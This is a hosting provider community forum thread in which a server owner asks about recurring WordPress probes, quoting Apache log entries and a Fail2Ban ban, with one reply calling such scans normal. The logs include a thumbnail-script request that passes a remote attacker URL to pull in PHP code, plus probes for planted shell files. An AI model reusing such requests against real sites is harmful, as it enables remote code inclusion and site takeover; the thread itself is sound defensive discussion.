View All Products
Compute
Storage
Databases
Networking
Developer Tools
Delivery
Security
Services
Industries
Pricing
Community
Engage With Us
Community Questions Curious about WordPress probes
Log in to Ask a Question

Curious about WordPress probes

general

I've noticed a common attempt at looking for WordPress sites on my VPS basically since I setup. This is not uncommon since I had similar issues before I moved over.

I don't have WordPress on my server and have never used it on any of the domains that I have hosted there. so any attempt is completely bogus.

While there are lots of IP only based attempts, I don't use any virtual websites that work with just and IP, they have to be accessed by host name… I have noticed a curious trend which is that most of the attempts are towards one of the virtual hosts and seldom to the others.

Are others seeing this as well?

I use Fail2Ban and created a rule to look for these attempts and block the IP of the site after they are caught, typically after 2 or more attempts and that works quite well.. but it is not uncommon for there to be upwards of 20-30 attempts from different sources a day all for the exact same stuff on the same domain.

The domain is not all that special and again has never had WordPress on it, so it seems peculiar why this is a trend. The only other thing I can think of is that they are starting there first, getting trapped and never have the chance to try other domains sharing the same IP.??

Example Entries:

static-178-252-217-209.nocdirect.com - - [11/Oct/2012:08:55:57 -0700] "GET /info/pagecount/wp-content/themes/folioway/core/thumb.php?src=http%3a%2f%2fwordpress.com.supplymi.com/tmp.php HTTP/1.1" 404 1034 "-" "Mozilla/5.0 (en-us) AppleWebKit/525.13 (KHTML, like Gecko; Google Web Preview) Version/3.1 Safari/525.13"
static-178-252-217-209.nocdirect.com - - [11/Oct/2012:08:55:57 -0700] "GET /info/pagecount/wp-content/themes/folioway/core/temp/52992e19d23ab002a7e4ab3cb478507d.php HTTP/1.1" 404 1034 "-" "Mozilla/5.0 (en-us) AppleWebKit/525.13 (KHTML, like Gecko; Google Web Preview) Version/3.1 Safari/525.13"
static-178-252-217-209.nocdirect.com - - [11/Oct/2012:08:55:57 -0700] "GET /info//wp-content/uploads/thumb-temp/52992e19d23ab002a7e4ab3cb478507d.php HTTP/1.1" 404 1034 "-" "Mozilla/5.0 (en-us) AppleWebKit/525.13 (KHTML, like Gecko; Google Web Preview) Version/3.1 Safari/525.13"
static-178-252-217-209.nocdirect.com - - [11/Oct/2012:08:55:58 -0700] "GET //wp-content/themes/clockstone/images/cache/external_52992e19d23ab002a7e4ab3cb478507d.php HTTP/1.1" 404 1034 "-" "Mozilla/5.0 (en-us) AppleWebKit/525.13 (KHTML, like Gecko; Google Web Preview) Version/3.1 Safari/525.13"

SITE BLOCKED
2012-10-11 08:55:58,760 fail2ban.actions: WARNING [apache-hacks] Ban 209.217.252.178

1 Reply

This kind of thing is normal, another common one is phpmyadmin just ignore them they do no harm.

Reply

Please enter an answer
Tips:

You can mention users to notify them: @username

You can use Markdown to format your question. For more examples see the Markdown Cheatsheet.

> I’m a blockquote.

I’m a blockquote.

[I'm a link] (https://www.google.com)

I'm a link

**I am bold** I am bold

*I am italicized* I am italicized

Log in to Reply
Community Code of Conduct